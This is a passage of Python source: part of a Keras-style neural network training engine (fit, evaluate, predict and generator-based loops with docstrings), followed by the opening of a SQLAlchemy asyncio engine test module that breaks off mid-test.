'batch_size': batch_size,
'nb_epoch': nb_epoch,
'nb_sample': nb_train_sample,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics or [],
})
callbacks.on_train_begin()
callback_model.stop_training = False
self.validation_data = val_ins
self.validation_gen = None
for epoch in range(initial_epoch, nb_epoch):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = make_batches(nb_train_sample, batch_size)
epoch_logs = {}
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if isinstance(ins[-1], float):
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
except TypeError:
raise TypeError('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch, **self._function_execute_args)
if not isinstance(outs, list):
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
if batch_index == len(batches) - 1: # last batch
# validation
if do_validation:
callbacks.on_val_begin(epoch)
# replace with self._evaluate
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_val_end(epoch, epoch_logs)
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
"""Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
"""
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if isinstance(ins[-1], float):
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
execute_kwargs = getattr(self, '_function_execute_args', {})
batch_outs = f(ins_batch, **execute_kwargs)
if not isinstance(batch_outs, list):
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (nb_sample,) + batch_out.shape[1:]
outs.append(np.zeros(shape, dtype=K.floatx()))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
if len(outs) == 1:
return outs[0]
return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
"""Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if isinstance(ins[-1], float):
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch, **self._function_execute_args)
if isinstance(batch_outs, list):
if batch_index == 0:
for batch_out in batch_outs:
outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i, out in enumerate(outs):
outs[i] /= nb_sample
if len(outs) == 1:
return outs[0]
return outs
def _standardize_user_data(self, x, y,
sample_weight=None, class_weight=None,
check_batch_axis=True, batch_size=None):
if not hasattr(self, 'optimizer'):
raise RuntimeError('You must compile a model before '
'training/testing. '
'Use `model.compile(optimizer, loss)`.')
output_shapes = []
for output_shape, loss_fn in zip(self.internal_output_shapes, self.loss_functions):
if loss_fn.__name__ == 'sparse_categorical_crossentropy':
output_shapes.append(output_shape[:-1] + (1,))
elif getattr(objectives, loss_fn.__name__, None) is None:
output_shapes.append(None)
else:
output_shapes.append(output_shape)
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_axis=False,
exception_prefix='model input')
y = standardize_input_data(y, self.output_names,
output_shapes,
check_batch_axis=False,
exception_prefix='model target')
sample_weights = standardize_sample_weights(sample_weight,
self.output_names)
class_weights = standardize_class_weights(class_weight,
self.output_names)
sample_weights = [standardize_weights(ref, sw, cw, mode)
for (ref, sw, cw, mode)
in zip(y, sample_weights, class_weights, self.sample_weight_modes)]
check_array_lengths(x, y, sample_weights)
check_loss_and_target_compatibility(y, self.loss_functions, self.internal_output_shapes)
if self.stateful and batch_size:
if x[0].shape[0] % batch_size != 0:
raise ValueError('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples')
return x, y, sample_weights
def fit(self, x, y, batch_size=32, nb_epoch=10, verbose=1, callbacks=None,
validation_split=0., validation_data=None, shuffle=True,
class_weight=None, sample_weight=None, initial_epoch=0):
"""Trains the model for a fixed number of epochs (iterations on a dataset).
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
nb_epoch: integer, the number of times to iterate
over the training data arrays.
verbose: 0, 1, or 2. Verbosity mode.
0 = silent, 1 = verbose, 2 = one log line per epoch.
callbacks: list of callbacks to be called during training.
See [callbacks](/callbacks).
validation_split: float between 0 and 1:
fraction of the training data to be used as validation data.
The model will set apart this fraction of the training data,
will not train on it, and will evaluate
the loss and any model metrics
on this data at the end of each epoch.
validation_data: data on which to evaluate
the loss and any model metrics
at the end of each epoch. The model will not
be trained on this data.
This could be a tuple (x_val, y_val)
or a tuple (x_val, y_val, val_sample_weights).
shuffle: boolean, whether to shuffle the training data
before each epoch.
class_weight: optional dictionary mapping
class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` instance. Its `history` attribute contains
all information collected during training.
"""
# validate user data
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_axis=False,
batch_size=batch_size)
# prepare validation data
if validation_data:
do_validation = True
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise ValueError('When passing validation_data, '
'it must contain 2 (x_val, y_val) '
'or 3 (x_val, y_val, val_sample_weights) '
'items, however it contains %d items' %
len(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(
val_x, val_y,
sample_weight=val_sample_weight,
check_batch_axis=False,
batch_size=batch_size)
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
elif validation_split and 0. < validation_split < 1.:
do_validation = True
split_at = int(len(x[0]) * (1. - validation_split))
x, val_x = (slice_X(x, 0, split_at), slice_X(x, split_at))
y, val_y = (slice_X(y, 0, split_at), slice_X(y, split_at))
sample_weights, val_sample_weights = (
slice_X(sample_weights, 0, split_at),
slice_X(sample_weights, split_at))
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
else:
do_validation = False
val_f = None
val_ins = None
# prepare input arrays and training function
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
f = self.train_function
# prepare display labels
out_labels = self.metrics_names
# rename duplicated metrics name
# (can happen with an output layer shared among multiple dataflows)
deduped_out_labels = []
for i, label in enumerate(out_labels):
new_label = label
if out_labels.count(label) > 1:
dup_idx = out_labels[:i].count(label)
new_label += '_' + str(dup_idx + 1)
deduped_out_labels.append(new_label)
out_labels = deduped_out_labels
if do_validation:
callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
else:
callback_metrics = copy.copy(out_labels)
# delegate logic to _fit_loop
return self._fit_loop(f, ins, out_labels=out_labels,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins, shuffle=shuffle,
callback_metrics=callback_metrics,
initial_epoch=initial_epoch)
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
"""Returns the loss value and metrics values for the model
in test mode. Computation is done in batches.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
# validate user data
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
check_batch_axis=False,
batch_size=batch_size)
# prepare inputs, delegate logic to _test_loop
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
f = self.test_function
return self._test_loop(f, ins,
batch_size=batch_size,
verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
"""Generates output predictions for the input samples,
processing the samples in a batched way.
# Arguments
x: the input data, as a Numpy array
(or list of Numpy arrays if the model has multiple inputs).
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
A Numpy array of predictions.
"""
# validate user data
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_axis=False)
if self.stateful:
if x[0].shape[0] > batch_size and x[0].shape[0] % batch_size != 0:
raise ValueError('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples. '
'Batch size: ' + str(batch_size) + '.')
# prepare inputs, delegate logic to _predict_loop
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + [0.]
else:
ins = x
self._make_predict_function()
f = self.predict_function
return self._predict_loop(f, ins,
batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
sample_weight=None, class_weight=None):
"""Runs a single gradient update on a single batch of data.
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
class_weight: optional dictionary mapping
class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
# Returns
Scalar training loss
(if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_axis=True)
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
outputs = self.train_function(ins, **self._function_execute_args)
if len(outputs) == 1:
return outputs[0]
return outputs
def test_on_batch(self, x, y, sample_weight=None):
"""Test the model on a single batch of samples.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
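        # Example
        A minimal sketch, assuming `model` is an already-compiled model and
        `x_val_batch`, `y_val_batch` are Numpy arrays for one held-out batch:
        ```python
        val_loss = model.test_on_batch(x_val_batch, y_val_batch)
        ```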
"""
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
check_batch_axis=True)
        if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
outputs = self.test_function(ins, **self._function_execute_args)
if len(outputs) == 1:
return outputs[0]
return outputs
def predict_on_batch(self, x):
"""Returns predictions for a single batch of samples.
"""
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes)
        if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + [0.]
else:
ins = x
self._make_predict_function()
outputs = self.predict_function(ins, **self._function_execute_args)
if len(outputs) == 1:
return outputs[0]
return outputs
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
verbose=1, callbacks=None,
validation_data=None, nb_val_samples=None,
class_weight=None,
max_q_size=10, nb_worker=1, pickle_safe=False,
initial_epoch=0):
"""Fits the model on data generated batch-by-batch by
a Python generator.
The generator is run in parallel to the model, for efficiency.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `samples_per_epoch`
samples have been seen by the model.
samples_per_epoch: integer, number of samples to process before
going to the next epoch.
nb_epoch: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
callbacks: list of callbacks to be called during training.
validation_data: this can be either
- a generator for the validation data
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
nb_val_samples: only relevant if `validation_data` is a generator.
number of samples to use from validation generator
at the end of every epoch.
class_weight: dictionary mapping class indices to a weight
for the class.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up
when using process based threading
pickle_safe: if True, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` object.
# Example
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield ({'input_1': x1, 'input_2': x2}, {'output': y})
f.close()
model.fit_generator(generate_arrays_from_file('/my_file.txt'),
samples_per_epoch=10000, nb_epoch=10)
```
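        If the validation data also comes from a generator (a sketch reusing the
        hypothetical `generate_arrays_from_file` helper above and an assumed
        separate validation file), `nb_val_samples` must be given as well:
        ```python
        model.fit_generator(generate_arrays_from_file('/my_file.txt'),
                            samples_per_epoch=10000, nb_epoch=10,
                            validation_data=generate_arrays_from_file('/my_val_file.txt'),
                            nb_val_samples=1000)
        ```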
"""
wait_time = 0.01 # in seconds
epoch = initial_epoch
do_validation = bool(validation_data)
self._make_train_function()
if do_validation:
self._make_test_function()
# python 2 has 'next', 3 has '__next__'
# avoid any explicit version checks
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not nb_val_samples:
raise ValueError('When using a generator for validation data, '
'you must specify a value for "nb_val_samples".')
out_labels = self.metrics_names
callback_metrics = out_labels + ['val_' + n for n in out_labels]
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + (callbacks or []) + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self:
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks.set_model(callback_model)
callbacks.set_params({
'nb_epoch': nb_epoch,
'nb_sample': samples_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
if do_validation:
if not val_gen:
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise Exception('validation_data should be a tuple '
'(val_x, val_y, val_sample_weight) '
'or (val_x, val_y). Found: ' + str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y, val_sample_weight)
self.validation_data = val_x + [val_y, val_sample_weights]
self.validation_gen = None
else:
ValidationGen = namedtuple('ValidationGen', ['generator', 'nb_samples'])
self.validation_data = None
self.validation_gen = ValidationGen(
generator=validation_data,
nb_samples=nb_val_samples
)
else:
self.validation_data = None
self.validation_gen = None
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(max_q_size=max_q_size, nb_worker=nb_worker)
callback_model.stop_training = False
while epoch < nb_epoch:
callbacks.on_epoch_begin(epoch)
samples_seen = 0
batch_index = 0
while samples_seen < samples_per_epoch:
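                    # Poll the enqueuer queue for the next generator output,
                    # sleeping wait_time between polls until a batch arrives.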
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' +
str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' +
str(generator_output))
# build batch logs
batch_logs = {}
if isinstance(x, list):
batch_size = x[0].shape[0]
elif isinstance(x, dict):
batch_size = list(x.values())[0].shape[0]
else:
batch_size = x.shape[0]
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
outs = self.train_on_batch(x, y,
sample_weight=sample_weight,
class_weight=class_weight)
if not isinstance(outs, list):
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# construct epoch logs
epoch_logs = {}
batch_index += 1
samples_seen += batch_size
# epoch finished
if samples_seen > samples_per_epoch:
warnings.warn('Epoch comprised more than '
'`samples_per_epoch` samples, '
'which might affect learning results. '
'Set `samples_per_epoch` correctly '
'to avoid this warning.')
if samples_seen >= samples_per_epoch and do_validation:
callbacks.on_val_begin(epoch)
if val_gen:
val_outs = self.evaluate_generator(
validation_data,
nb_val_samples,
max_q_size=max_q_size,
nb_worker=nb_worker,
pickle_safe=pickle_safe)
else:
# no need for try/except because
# data has already been validated
val_outs = self.evaluate(
val_x, val_y,
batch_size=batch_size,
sample_weight=val_sample_weights,
verbose=0)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_val_end(epoch, epoch_logs)
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if callback_model.stop_training:
break
finally:
if enqueuer is not None:
enqueuer.stop()
callbacks.on_train_end()
return self.history
def evaluate_generator(self, generator, val_samples,
max_q_size=10, nb_worker=1, pickle_safe=False):
"""Evaluates the model on a data generator. The generator should
return the same kind of data as accepted by `test_on_batch`.
        # Arguments
generator:
generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
val_samples:
total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up
when using process based threading
pickle_safe: if True, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
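        # Example
        A minimal sketch, assuming `model` is a compiled model and `x_val`,
        `y_val` are Numpy arrays matching its inputs and outputs:
        ```python
        def eval_generator(x_val, y_val, batch_size=32):
            while 1:
                for i in range(0, len(x_val), batch_size):
                    yield x_val[i:i + batch_size], y_val[i:i + batch_size]
        score = model.evaluate_generator(eval_generator(x_val, y_val),
                                         val_samples=len(x_val))
        ```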
"""
self._make_test_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
weights = []
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(nb_worker=nb_worker, max_q_size=max_q_size)
while processed_samples < val_samples:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
outs = self.test_on_batch(x, y, sample_weight=sample_weight)
if isinstance(x, list):
nb_samples = len(x[0])
elif isinstance(x, dict):
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
all_outs.append(outs)
processed_samples += nb_samples
weights.append(nb_samples)
finally:
if enqueuer is not None:
enqueuer.stop()
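        # Average the per-batch outputs, weighting each batch by the number of
        # samples it contained.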
if not isinstance(outs, list):
return np.average(np.asarray(all_outs),
weights=weights)
else:
averages = []
for i in range(len(outs)):
averages.append(np.average([out[i] for out in all_outs],
weights=weights))
return averages
def predict_generator(self, generator, val_samples,
max_q_size=10, nb_worker=1, pickle_safe=False):
"""Generates predictions for the input samples from a data generator.
The generator should return the same kind of data as accepted by
`predict_on_batch`.
# Arguments
generator: generator yielding batches of input samples.
val_samples: total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up
when using process based threading
pickle_safe: if True, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
# Returns
Numpy array(s) of predictions.
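        # Example
        A minimal sketch, assuming `model` is a compiled model and `x_test` is
        a Numpy array matching its input shape:
        ```python
        def predict_gen(x_test, batch_size=32):
            while 1:
                for i in range(0, len(x_test), batch_size):
                    yield x_test[i:i + batch_size]
        predictions = model.predict_generator(predict_gen(x_test),
                                               val_samples=len(x_test))
        ```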
"""
self._make_predict_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(nb_worker=nb_worker, max_q_size=max_q_size)
while processed_samples < val_samples:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if isinstance(generator_output, tuple):
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' +
str(generator_output))
else:
x = generator_output
outs = self.predict_on_batch(x)
if isinstance(x, list):
nb_samples = len(x[0])
elif isinstance(x, dict):
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
if not isinstance(outs, list):
outs = [outs]
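                # On the first batch, preallocate output arrays sized for
                # val_samples, then fill them slice by slice as batches arrive.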
if len(all_outs) == 0:
for out in outs:
shape = (val_samples,) + out.shape[1:]
all_outs.append(np.zeros(shape, dtype=K.floatx()))
for i, out in enumerate(outs):
all_outs[i][processed_samples:(processed_samples + nb_samples)] = out
processed_samples += nb_samples
finally:
if enqueuer is not None:
enqueuer.stop()
if len(all_outs) == 1:
return all_outs[0]
return all_outs
|
test_engine_py3k.py
|
import asyncio
from sqlalchemy import Column
from sqlalchemy import create_engine
from sqlalchemy import delete
from sqlalchemy import event
from sqlalchemy import exc
from sqlalchemy import func
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import union_all
from sqlalchemy.ext.asyncio import create_async_engine
from sqlalchemy.ext.asyncio import engine as _async_engine
from sqlalchemy.ext.asyncio import exc as asyncio_exc
from sqlalchemy.ext.asyncio.base import ReversibleProxy
from sqlalchemy.ext.asyncio.engine import AsyncConnection
from sqlalchemy.ext.asyncio.engine import AsyncEngine
from sqlalchemy.pool import AsyncAdaptedQueuePool
from sqlalchemy.testing import assertions
from sqlalchemy.testing import async_test
from sqlalchemy.testing import combinations
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_none
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing import ne_
from sqlalchemy.util.concurrency import greenlet_spawn
class AsyncFixture:
@config.fixture(
params=[
(rollback, run_second_execute, begin_nested)
for rollback in (True, False)
for run_second_execute in (True, False)
for begin_nested in (True, False)
]
)
def async_trans_ctx_manager_fixture(self, request, metadata):
rollback, run_second_execute, begin_nested = request.param
from sqlalchemy import Table, Column, Integer, func, select
t = Table("test", metadata, Column("data", Integer))
eng = getattr(self, "bind", None) or config.db
t.create(eng)
async def run_test(subject, trans_on_subject, execute_on_subject):
async with subject.begin() as trans:
if begin_nested:
if not config.requirements.savepoints.enabled:
config.skip_test("savepoints not enabled")
if execute_on_subject:
nested_trans = subject.begin_nested()
else:
nested_trans = trans.begin_nested()
async with nested_trans:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
# for nested trans, we always commit/rollback on the
# "nested trans" object itself.
# only Session(future=False) will affect savepoint
# transaction for session.commit/rollback
if rollback:
await nested_trans.rollback()
else:
await nested_trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction "
"inside context manager. Please complete the "
"context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(
t.insert(), {"data": 12}
)
else:
await trans.execute(
t.insert(), {"data": 12}
)
# outside the nested trans block, but still inside the
# transaction block, we can run SQL, and it will be
# committed
if execute_on_subject:
await subject.execute(t.insert(), {"data": 14})
else:
await trans.execute(t.insert(), {"data": 14})
else:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
if trans_on_subject:
if rollback:
await subject.rollback()
else:
await subject.commit()
else:
if rollback:
await trans.rollback()
else:
await trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction inside "
"context "
"manager. Please complete the context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(t.insert(), {"data": 12})
else:
await trans.execute(t.insert(), {"data": 12})
expected_committed = 0
if begin_nested:
# begin_nested variant, we inserted a row after the nested
# block
expected_committed += 1
if not rollback:
# not rollback variant, our row inserted in the target
# block itself would be committed
expected_committed += 1
if execute_on_subject:
eq_(
await subject.scalar(select(func.count()).select_from(t)),
expected_committed,
)
else:
with subject.connect() as conn:
eq_(
await conn.scalar(select(func.count()).select_from(t)),
expected_committed,
)
return run_test
class EngineFixture(AsyncFixture, fixtures.TablesTest):
__requires__ = ("async_dialect",)
@testing.fixture
def async_engine(self):
return engines.testing_engine(asyncio=True, transfer_staticpool=True)
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", Integer, primary_key=True, autoincrement=False),
Column("user_name", String(20)),
)
@classmethod
def insert_data(cls, connection):
users = cls.tables.users
connection.execute(
users.insert(),
[{"user_id": i, "user_name": "name%d" % i} for i in range(1, 20)],
)
class AsyncEngineTest(EngineFixture):
__backend__ = True
@testing.fails("the failure is the test")
@async_test
async def test_we_are_definitely_running_async_tests(self, async_engine):
async with async_engine.connect() as conn:
eq_(await conn.scalar(text("select 1")), 2)
@async_test
async def test_interrupt_ctxmanager_connection(
self, async_engine, async_trans_ctx_manager_fixture
):
